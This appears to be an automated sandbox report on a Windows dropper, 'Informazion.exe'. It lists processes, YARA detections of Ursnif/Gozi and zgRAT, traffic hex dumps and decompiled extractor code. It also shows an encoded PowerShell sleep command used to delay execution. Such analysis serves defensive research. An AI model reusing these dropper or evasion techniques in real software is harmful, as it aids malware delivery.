da be 7c 80 15 5b 6d e9 42 49 90 90 12 a7 7e b1 d5 df 64 97 7a d4 99 4b c9 fe ac fb 7a ef 60 bb 06
                                                  Data Ascii: \{&7G2V9l'S^?/RlH<]U#|GTGd:I&-hc`b?-$h^xj6S)v!^H7)MV1!l"/B[m^-}7{y\8)buXC1d)f|[mBI~dzKz`
                                                  2023-01-12 11:11:41 UTC784INData Raw: 96 88 5f c1 3f 52 19 60 52 d2 29 98 15 8d ac 1c 98 9b e1 27 d1 9e 16 bd a4 d5 e3 e7 4f 13 88 9b 2a 11 5f 52 ed 14 61 3f 69 0f 0f d0 e5 07 03 3b 3e a9 2e 44 a6 c8 d9 6d ca 3d 98 78 4b 17 5e b6 7d fe be 42 0b ea 6b 02 fa 47 b5 59 51 bc 7e c8 a5 a7 f7 bd 88 af 1e d5 11 ad 2f f7 4d c8 7b e0 4e 62 63 5a 48 04 f0 74 4e 93 c5 1c ab 78 23 18 ad 96 cf 1e 46 b4 09 cf 15 eb a1 70 1e e9 b1 8f b8 c2 b0 e4 d1 fe 84 a4 25 75 db 90 9a cb ec 42 72 6d 87 86 49 26 ef 34 c1 46 6e 91 13 d1 06 f4 31 80 c2 14 7c 78 c8 7f 40 07 bb 7b 23 2b 17 e8 20 77 37 af 54 64 02 2c c2 2d 3e 9a d5 76 7f 72 ae 2d 2e 7e 6a 2b d1 68 dc 3c fa 60 c9 e4 5a 2b c2 8e 49 d9 18 3c 17 11 85 3c bf 7a 0b 27 bd 65 47 dd 01 e4 07 0e 29 0f 62 16 97 5e 8e 9c 6f 1d 12 dc e5 b2 f5 05 ea e9 2f 72 ca cc dd 23 0e
                                                  Data Ascii: _?R`R)'O*_Ra?i;>.Dm=xK^}BkGYQ~/M{NbcZHtNx#Fp%uBrmI&4Fn1|x@{#+ w7Td,->vr-.~j+h<`Z+I<<z'eG)b^o/r#
                                                  2023-01-12 11:11:41 UTC800INData Raw: 07 17 71 7d 71 74 75 6f 5a 2f 0c 1f 03 04 1c 1f 2d 6b 7e 77 75 72 6d 65 73 6e 77 6e 69 74 75 66 76 43 64 60 6a 6a 75 68 b6 e2 c1 7e 6f 72 64 6d 73 6e 77 68 73 74 75 66 75 66 62 79 6a 6a 75 6b 54 62 71 77 74 72 64 6d 73 6e 77 68 71 74 75 66 75 66 62 79 6b 6a 75 6b 55 62 70 76 74 76 61 6d 73 6e 50 3b 08 07 01 03 1a 48 25 15 05 08 14 07 3d 18 10 03 1c 1d 0a 43 37 0f 03 0d 25 1d 18 03 31 09 10 14 0b 1e 3c 05 32 0d 5a 77 75 72 62 00 2c 00 16 05 14 78 14 0b 33 03 11 10 0d 04 14 1f 3b 10 7d 07 18 36 01 1e 1a 09 19 09 05 1b 07 6b 13 07 16 1c 39 0f 05 0a 26 03 05 18 07 65 03 08 1d 0b 05 09 1d 27 1d 09 05 12 36 10 07 0f 25 0a 20 16 14 05 1b 64 03 08 1d 0b 05 09 1d 38 1a 08 10 32 0b 14 0f 3a 14 1f 20 07 03 19 78 06 0d 00 16 3d 12 18 10 06 14 12 18 14 6d 14 05 04 01
                                                  Data Ascii: q}qtuoZ/-k~wurmesnwnitufvCd`jjuh~ordmsnwhstufufbyjjukTbqwtrdmsnwhqtufufbykjukUbpvtvamsnP;H%=C7%1<2Zwurb,x3;}6k9&e'6% d82: x=m

                                                  Target ID:0
                                                  Start time:12:11:02
                                                  Start date:12/01/2023
                                                  Path:C:\Users\user\Desktop\Informazion.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\Informazion.exe
                                                  Imagebase:0x7ff64c510000
                                                  File size:774656 bytes
                                                  MD5 hash:EF4C4F0B7A8CD7B8BD2D2DC6E5982043
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:1
                                                  Start time:12:11:31
                                                  Start date:12/01/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                                                  Imagebase:0x840000
                                                  File size:380008704 bytes
                                                  MD5 hash:B405B1565194722F9457002C4EDACBAE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.501526804.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.499268077.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.508878561.000000000C370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  Reputation:low

                                                  Target ID:2
                                                  Start time:12:11:42
                                                  Start date:12/01/2023
                                                  Path:C:\Windows\System32\rundll32.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                  Imagebase:0x7ff729970000
                                                  File size:69632 bytes
                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:3
                                                  Start time:12:11:49
                                                  Start date:12/01/2023
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
                                                  Imagebase:0x130000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Target ID:4
                                                  Start time:12:11:49
                                                  Start date:12/01/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7c72c0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:7
                                                  Start time:12:12:36
                                                  Start date:12/01/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
                                                  Imagebase:0x810000
                                                  File size:380008704 bytes
                                                  MD5 hash:B405B1565194722F9457002C4EDACBAE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                    Execution Graph

                                                    Execution Coverage:27.6%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:41.9%
                                                    Total number of Nodes:924
                                                    Total number of Limit Nodes:45
2930->2928 2932 7ff64c512b36 CharPrevA 2930->2932 2938 7ff64c517c40 2930->2938 2932->2930 2934 7ff64c517d00 2933->2934 2935 7ff64c517d0a IsDBCSLeadByte 2934->2935 2936 7ff64c517d47 2934->2936 2937 7ff64c517d30 CharNextA 2934->2937 2935->2934 2935->2936 2936->2913 2937->2934 2939 7ff64c517c58 2938->2939 2939->2939 2940 7ff64c517c61 CharPrevA 2939->2940 2941 7ff64c517c7d CharPrevA 2940->2941 2942 7ff64c517c94 2941->2942 2943 7ff64c517c75 2941->2943 2944 7ff64c517cc7 2942->2944 2945 7ff64c517c9e CharPrevA 2942->2945 2946 7ff64c517cb5 CharNextA 2942->2946 2943->2941 2943->2942 2944->2930 2945->2944 2945->2946 2946->2944 2947->2890 2948->2706 2950 7ff64c5122eb 2949->2950 2951 7ff64c512281 2949->2951 2952 7ff64c518470 7 API calls 2950->2952 2953 7ff64c517ba8 CharPrevA 2951->2953 2954 7ff64c5122fd 2952->2954 2955 7ff64c512294 WritePrivateProfileStringA _lopen 2953->2955 2954->2362 2955->2950 2956 7ff64c5122c7 _llseek _lclose 2955->2956 2956->2950 2187 7ff64c515690 2194 7ff64c513b40 2187->2194 2190 7ff64c5156c2 WriteFile 2191 7ff64c5156ba 2190->2191 2192 7ff64c5156f9 2190->2192 2192->2191 2193 7ff64c515725 SendDlgItemMessageA 2192->2193 2193->2191 2195 7ff64c513b4c MsgWaitForMultipleObjects 2194->2195 2196 7ff64c513b74 PeekMessageA 2195->2196 2197 7ff64c513be5 2195->2197 2196->2195 2198 7ff64c513b99 2196->2198 2197->2190 2197->2191 2198->2195 2198->2197 2199 7ff64c513ba7 DispatchMessageA 2198->2199 2200 7ff64c513bb8 PeekMessageA 2198->2200 2199->2200 2200->2198 3071 7ff64c513910 3072 7ff64c513933 3071->3072 3092 7ff64c513a09 3071->3092 3073 7ff64c513948 3072->3073 3074 7ff64c513a11 GetDesktopWindow 3072->3074 3072->3092 3078 7ff64c51397b 3073->3078 3079 7ff64c51394c 3073->3079 3077 7ff64c514c68 14 API calls 3074->3077 3075 7ff64c513954 3076 7ff64c513b1a EndDialog 3076->3075 3080 7ff64c513a2f 3077->3080 3078->3075 3082 7ff64c513985 ResetEvent 3078->3082 3079->3075 3081 7ff64c51395b TerminateThread 3079->3081 3083 7ff64c513a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 
3080->3083 3084 7ff64c513a9b SetWindowTextA CreateThread 3080->3084 3081->3076 3085 7ff64c514dcc 24 API calls 3082->3085 3083->3084 3084->3075 3086 7ff64c513ae8 3084->3086 3087 7ff64c5139c3 3085->3087 3088 7ff64c514dcc 24 API calls 3086->3088 3089 7ff64c5139e4 SetEvent 3087->3089 3090 7ff64c5139cc SetEvent 3087->3090 3088->3092 3091 7ff64c513b40 4 API calls 3089->3091 3090->3075 3091->3092 3092->3075 3092->3076 3093 7ff64c5180d0 3094 7ff64c5180e2 3093->3094 3100 7ff64c518818 GetModuleHandleW 3094->3100 3096 7ff64c518149 __set_app_type 3097 7ff64c518186 3096->3097 3098 7ff64c51819c 3097->3098 3099 7ff64c51818f __setusermatherr 3097->3099 3099->3098 3101 7ff64c51882d 3100->3101 3101->3096 3104 7ff64c518750 3105 7ff64c51875f 3104->3105 3106 7ff64c518782 3104->3106 3105->3106 3107 7ff64c51877b ?terminate@ 3105->3107 3107->3106

                                                    Callgraph

                                                    (Rendered callgraph of 95 functions, nodes 0-94 named Function_00007FF64C511008 through Function_00007FF64C518B60, with their call edges; graph data not reproduced here.)

                                                    Control-flow Graph

                                                    (Rendered control-flow graph of the function at 0x7ff64c5140c4: 112 basic blocks, ids 0-111, with their branch edges and the API calls made in each block, e.g. memset, CompareStringA, RegOpenKeyExA, RegQueryValueExA, GetSystemDirectoryA, GetProcAddress, RegSetValueExA, FreeLibrary, LocalFree; graph data not reproduced here.)
                                                    C-Code - Quality: 46%
                                                    			E00007FF67FF64C5140C4(intOrPtr __esi, long long __rbx, long long __rdi, signed long long __rsi) {
                                                    				void* __rbp;
                                                    				intOrPtr _t78;
                                                    				signed char _t80;
                                                    				char _t86;
                                                    				void* _t89;
                                                    				signed char _t93;
                                                    				signed char _t94;
                                                    				intOrPtr _t95;
                                                    				intOrPtr _t96;
                                                    				void* _t98;
                                                    				short _t104;
                                                    				intOrPtr _t105;
                                                    				signed int _t111;
                                                    				intOrPtr _t119;
                                                    				void* _t120;
                                                    				void* _t122;
                                                    				char _t136;
                                                    				void* _t140;
                                                    				void* _t144;
                                                    				void* _t145;
                                                    				void* _t148;
                                                    				void* _t153;
                                                    				void* _t163;
                                                    				signed long long _t164;
                                                    				long long _t171;
                                                    				char* _t186;
                                                    				void* _t187;
                                                    				void* _t201;
                                                    				signed long long _t210;
                                                    				struct HINSTANCE__* _t213;
                                                    				void* _t214;
                                                    				void* _t216;
                                                    				signed long long _t217;
                                                    				void* _t224;
                                                    				void* _t226;
                                                    				struct HINSTANCE__* _t228;
                                                    				int _t230;
                                                    				int _t232;
                                                    				void* _t234;
                                                    
                                                    				_t210 = __rsi;
                                                    				_t176 = __rbx;
                                                    				_t119 = __esi;
                                                    				_t163 = _t216;
                                                    				 *((long long*)(_t163 + 8)) = __rbx;
                                                    				 *((long long*)(_t163 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t163 + 0x18)) = __rdi;
                                                    				_t214 = _t163 - 0x488;
                                                    				_t217 = _t216 - 0x560;
                                                    				_t164 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t214 + 0x450) = _t164 ^ _t217;
                                                    				r13d = 0;
                                                    				_t120 =  *0x4c51cd08 - r13d; // 0x0
                                                    				r15d = r13d;
                                                    				r12d = r13d;
                                                    				 *0x4c51d544 = r13d;
                                                    				_t6 = _t230 + 3; // 0x3
                                                    				_t104 = _t6;
                                                    				if (_t120 != 0) goto 0x4c514139;
                                                    				_t7 = _t230 + 4; // 0x4
                                                    				r8d = _t7;
                                                    				if (E00007FF67FF64C515050(_t164 ^ _t217, __rbx, "REBOOT", 0x4c51de5c, __rsi, _t214) - 1 - _t104 > 0) goto 0x4c514254;
                                                    				r14d = r13d;
                                                    				 *((intOrPtr*)(_t217 + 0x30)) = r13d;
                                                    				r8d = 0x7ff64c51dec0;
                                                    				memset(_t234, _t232, _t230);
                                                    				_t122 =  *0x4c51cf22 - r13b; // 0x0
                                                    				 *((intOrPtr*)(_t214 - 0x80)) = 0x68;
                                                    				if (_t122 != 0) goto 0x4c514282;
                                                    				r8d = 4;
                                                    				if (E00007FF67FF64C515050(_t164 ^ _t217, _t176, "SHOWWINDOW", _t217 + 0x40, _t210 | 0xffffffff, _t214) - 1 - _t104 > 0) goto 0x4c514254;
                                                    				_t78 =  *((intOrPtr*)(_t217 + 0x40));
                                                    				if (_t78 != 1) goto 0x4c51419d;
                                                    				 *((intOrPtr*)(_t214 - 0x40)) = r13w;
                                                    				goto 0x4c5141b5;
                                                    				if (_t78 != 2) goto 0x4c5141ad;
                                                    				 *((short*)(_t214 - 0x40)) = 6;
                                                    				goto 0x4c5141b5;
                                                    				if (6 != _t104) goto 0x4c5141b8;
                                                    				 *((short*)(_t214 - 0x40)) = _t104;
                                                    				 *((intOrPtr*)(_t214 - 0x44)) = 1;
                                                    				if (r14d != 0) goto 0x4c5142c5;
                                                    				_t80 =  *0x4c51cd18 & 0x0000ffff;
                                                    				if (_t80 == 0) goto 0x4c514231;
                                                    				if ((dil & _t80) == 0) goto 0x4c5141db;
                                                    				goto 0x4c5141ea;
                                                    				if ((_t80 & 0x00000002) == 0) goto 0x4c5144ee;
                                                    				r8d = 0x104;
                                                    				if (E00007FF67FF64C515050(_t164 ^ _t217, _t176, "USRQCMD", _t214 - 0x10, _t210 | 0xffffffff, _t214) == 0) goto 0x4c514254;
                                                    				 *((intOrPtr*)(_t217 + 0x28)) = __esi;
                                                    				r9d = __esi;
                                                    				 *((long long*)(_t217 + 0x20)) = "<None>";
                                                    				CompareStringA(??, ??, ??, ??, ??, ??);
                                                    				r15d =  !=  ? 1 : r15d;
                                                    				if (r15d != 0) goto 0x4c514328;
                                                    				r8d = 0x104;
                                                    				_t201 = _t214 - 0x10;
                                                    				if (E00007FF67FF64C515050("<None>", _t176, "RUNPROGRAM", _t201, _t210 | 0xffffffff, _t214) != 0) goto 0x4c5142c5;
                                                    				 *((intOrPtr*)(_t217 + 0x28)) = r13d;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t217 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC("RUNPROGRAM", _t214 - 0x10, _t224, _t226);
                                                    				 *0x4c51d544 = 0x80070714;
                                                    				goto 0x4c5144ee;
                                                    				_t186 = _t214 - 0x10;
                                                    				_t31 = _t201 + 0x7ffffefa; // 0x7ffffffe
                                                    				if (_t31 == 0) goto 0x4c5142b7;
                                                    				_t86 =  *((intOrPtr*)(0x4c51cf22 - _t214 - 0x10 + _t186));
                                                    				_t136 = _t86;
                                                    				if (_t136 == 0) goto 0x4c5142b7;
                                                    				 *_t186 = _t86;
                                                    				_t187 = _t186 + __rdi;
                                                    				if (_t136 != 0) goto 0x4c514299;
                                                    				_t170 =  !=  ? _t187 : _t187 - 1;
                                                    				 *((intOrPtr*)( !=  ? _t187 : _t187 - 1)) = r13b;
                                                    				if (r14d != 1) goto 0x4c514328;
                                                    				r8d = 0x104;
                                                    				if (E00007FF67FF64C515050( !=  ? _t187 : _t187 - 1, _t176, "POSTRUNPROGRAM", _t214 - 0x10, _t210 | 0xffffffff, _t214) == 0) goto 0x4c514254;
                                                    				_t140 =  *0x4c51cf22 - r13b; // 0x0
                                                    				if (_t140 != 0) goto 0x4c5145d8;
                                                    				_t171 = "<None>";
                                                    				 *((intOrPtr*)(_t217 + 0x28)) = _t119;
                                                    				r9d = _t119;
                                                    				 *((long long*)(_t217 + 0x20)) = _t171;
                                                    				if (CompareStringA(??, ??, ??, ??, ??, ??) == 2) goto 0x4c5145d8;
                                                    				_t89 = E00007FF67FF64C511684(_t104, _t176, _t214 - 0x10, _t214 - 0x10, _t217 + 0x38, _t217 + 0x30); // executed
                                                    				if (_t89 == 0) goto 0x4c5144ee;
                                                    				_t105 =  *((intOrPtr*)(_t217 + 0x30));
                                                    				if (r12d != 0) goto 0x4c51436a;
                                                    				_t144 =  *0x4c51de78 - 1; // 0x3
                                                    				if (_t144 == 0) goto 0x4c51436a;
                                                    				_t145 =  *0x4c51cd00 - r13d; // 0x0
                                                    				if (_t145 == 0) goto 0x4c51436a;
                                                    				if (_t105 != 0) goto 0x4c514372;
                                                    				r12d = 1; // executed
                                                    				E00007FF67FF64C511D28(_t176, __rdi, _t210 | 0xffffffff, _t217 + 0x30); // executed
                                                    				if (_t105 == 0) goto 0x4c514493;
                                                    				_t148 =  *0x4c51c1a8 - r13d; // 0x1
                                                    				if (_t148 == 0) goto 0x4c514599;
                                                    				if (_t105 == 0) goto 0x4c514493;
                                                    				if (( *0x4c51de64 & 0x00000004) == 0) goto 0x4c514493;
                                                    				E00007FF67FF64C5179F0(_t214 - 0x10, _t217 + 0x38);
                                                    				if (_t171 == 0) goto 0x4c514574;
                                                    				GetProcAddress(_t228);
                                                    				if (_t171 == 0) goto 0x4c514521;
                                                    				_t153 =  *0x4c51cd10 - r13d; // 0x0
                                                    				 *((long long*)(_t217 + 0x50)) = 0x4c51d578;
                                                    				 *((long long*)(_t217 + 0x60)) = 0x4c51d610;
                                                    				 *((short*)(_t217 + 0x70)) =  *0x4c51de78 & 0x0000ffff;
                                                    				_t111 =  *0x4c51cd18 & 0x0000ffff;
                                                    				 *((long long*)(_t217 + 0x68)) = _t214 - 0x10;
                                                    				 *(_t217 + 0x48) = _t230;
                                                    				 *((long long*)(_t217 + 0x58)) =  *((intOrPtr*)(_t217 + 0x38));
                                                    				 *(_t217 + 0x74) = _t111;
                                                    				if (_t153 == 0) goto 0x4c51441f;
                                                    				asm("bts ecx, 0x10");
                                                    				 *(_t217 + 0x74) = _t111;
                                                    				_t93 =  *0x4c51de64; // 0x1
                                                    				if ((_t93 & 0x00000008) == 0) goto 0x4c514431;
                                                    				asm("bts ecx, 0x11");
                                                    				 *(_t217 + 0x74) = _t111;
                                                    				if ((_t93 & 0x00000010) == 0) goto 0x4c51443d;
                                                    				asm("bts ecx, 0x12");
                                                    				 *(_t217 + 0x74) = _t111;
                                                    				_t94 =  *0x4c51d028; // 0x0
                                                    				if ((_t94 & 0x00000040) == 0) goto 0x4c51444f;
                                                    				asm("bts ecx, 0x13");
                                                    				 *(_t217 + 0x74) = _t111;
                                                    				if (_t94 >= 0) goto 0x4c51445b;
                                                    				asm("bts ecx, 0x14");
                                                    				 *(_t217 + 0x74) = _t111;
                                                    				_t95 =  *0x4c51de68; // 0x0
                                                    				 *((intOrPtr*)(_t217 + 0x78)) = _t95;
                                                    				_t96 =  *0x4c519650();
                                                    				 *0x4c51d544 = _t96;
                                                    				if (_t96 < 0) goto 0x4c5144d3;
                                                    				FreeLibrary(_t213);
                                                    				goto 0x4c5144ad;
                                                    				if ( *((intOrPtr*)(_t217 + 0x38)) == 0) goto 0x4c5144df;
                                                    				_t98 = E00007FF67FF64C51473C(1,  *((intOrPtr*)(_t217 + 0x38)),  *((intOrPtr*)(_t217 + 0x38)), _t214 - 0x80); // executed
                                                    				if (_t98 == 0) goto 0x4c5144df;
                                                    				LocalFree(??);
                                                    				r14d = r14d + 1;
                                                    				if (r14d - 2 >= 0) goto 0x4c5145d8;
                                                    				goto 0x4c514145;
                                                    				FreeLibrary(??);
                                                    				LocalFree(??);
                                                    				return E00007FF67FF64C518470(0, _t111,  *(_t214 + 0x450) ^ _t217);
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$Maintal$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                    • API String ID: 2679723528-456226487
                                                    • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                    • Instruction ID: d9c2cdb3898b70f87e8a094213bf06ea7287a23c6490a2cb3b27d7070a1b8062
                                                    • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                    • Instruction Fuzzy Hash: D3027A75E0C68286EB28BF18A8486BD7FA0FB84754F442137DA6E82794DF7CE565C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 23%
                                                    			E00007FF67FF64C511D28(long long __rbx, long long __rdi, long long __rsi, void* __r9) {
                                                    				void* __rbp;
                                                    				long _t51;
                                                    				long _t53;
                                                    				void* _t61;
                                                    				signed int _t62;
                                                    				void* _t87;
                                                    				void* _t105;
                                                    				signed long long _t106;
                                                    				signed long long _t110;
                                                    				void* _t112;
                                                    				signed int _t114;
                                                    				signed long long _t117;
                                                    				signed long long _t118;
                                                    				void* _t135;
                                                    				signed int _t153;
                                                    				long long _t155;
                                                    				int _t157;
                                                    				void* _t160;
                                                    				signed long long _t161;
                                                    				void* _t170;
                                                    				int _t172;
                                                    				void* _t175;
                                                    
                                                    				_t168 = __r9;
                                                    				_t155 = __rsi;
                                                    				_t105 = _t160;
                                                    				 *((long long*)(_t105 + 8)) = __rbx;
                                                    				 *((long long*)(_t105 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t105 + 0x18)) = __rdi;
                                                    				_t158 = _t105 - 0x1a8;
                                                    				_t161 = _t160 - 0x290;
                                                    				_t106 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t105 - 0x1a8 + 0x180) = _t106 ^ _t161;
                                                    				r8d = 0x104;
                                                    				memset(_t175, _t172, _t157);
                                                    				r8d = 0x104;
                                                    				memset(??, ??, ??);
                                                    				r14d = 0;
                                                    				 *((long long*)(_t161 + 0x40)) = _t161 + 0x58;
                                                    				r9d = 0;
                                                    				 *((long long*)(_t161 + 0x38)) = _t161 + 0x50;
                                                    				r8d = 0;
                                                    				 *(_t161 + 0x30) =  *(_t161 + 0x30) & _t175;
                                                    				 *(_t161 + 0x28) = 0x2001f;
                                                    				 *(_t161 + 0x20) =  *(_t161 + 0x20) & r14d;
                                                    				_t51 = RegCreateKeyExA(??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
                                                    				if (_t51 != 0) goto 0x4c512019;
                                                    				_t17 = _t155 - 0x3c; // 0xc8
                                                    				_t87 = _t17;
                                                    				r9d = 0;
                                                    				E00007FF67FF64C51114C(0x4c51c7d0, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", "wextract_cleanup%d", __r9);
                                                    				_t110 = _t161 + 0x5c;
                                                    				 *(_t161 + 0x28) = _t110;
                                                    				 *(_t161 + 0x20) =  *(_t161 + 0x20) & _t175;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				_t53 = RegQueryValueExA(??, ??, ??, ??, ??, ??); // executed
                                                    				if (_t53 != 0) goto 0x4c511e25;
                                                    				if (1 - _t87 < 0) goto 0x4c511dd3;
                                                    				if (1 != _t87) goto 0x4c511e46;
                                                    				RegCloseKey(??);
                                                    				 *0x4c51c7d0 = r14b;
                                                    				goto 0x4c512019;
                                                    				GetSystemDirectoryA(??, ??);
                                                    				E00007FF67FF64C517BA8(0x104, _t110, __rbx, _t105 - 0x1a8 + 0x70, __rsi, _t158, "advpack.dll");
                                                    				LoadLibraryA(??); // executed
                                                    				if (_t110 == 0) goto 0x4c511f55;
                                                    				GetProcAddress(??, ??);
                                                    				_t117 = _t110;
                                                    				r14b = _t110 != 0;
                                                    				FreeLibrary(??); // executed
                                                    				if (_t117 == 0) goto 0x4c511f55;
                                                    				if (GetSystemDirectoryA(??, ??) == 0) goto 0x4c511ee8;
                                                    				_t61 = E00007FF67FF64C517BA8(0x104, _t110, _t117, _t161 + 0x60, _t155, _t158, 0x4c519700);
                                                    				_t118 = _t117 | 0xffffffff;
                                                    				_t112 = _t118 + 1;
                                                    				if ( *((char*)(_t112 + 0x4c51d610)) != 0) goto 0x4c511ef6;
                                                    				_t135 = _t118 + 1;
                                                    				if ( *((char*)(_t161 + 0x60 + _t135)) != 0) goto 0x4c511f08;
                                                    				_t114 = _t112 + 0x50 + _t135;
                                                    				_t62 = LocalAlloc(??, ??);
                                                    				_t153 = _t114;
                                                    				if (_t114 != 0) goto 0x4c511f8e;
                                                    				 *(_t161 + 0x28) =  *(_t161 + 0x28) & _t62;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *(_t161 + 0x20) = 0x10;
                                                    				E00007FF67FF64C514DCC(_t135, 0x4c519700, _t168, _t170);
                                                    				goto 0x4c511f78;
